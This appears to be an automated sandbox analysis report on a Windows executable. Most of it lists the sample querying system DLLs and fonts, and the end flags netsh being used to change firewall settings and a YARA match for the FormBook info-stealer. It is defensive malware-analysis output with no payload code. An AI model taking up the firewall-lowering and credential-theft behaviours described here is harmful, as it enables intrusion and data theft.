          Source: explorer.exe, 00000004.00000000.1702259506.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4141580919.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.1702259506.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4141580919.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_01569B55 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_01569B55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_015692E8 memset,GetVersionExW,6_2_015692E8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Uses netsh to modify the Windows network and firewall settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
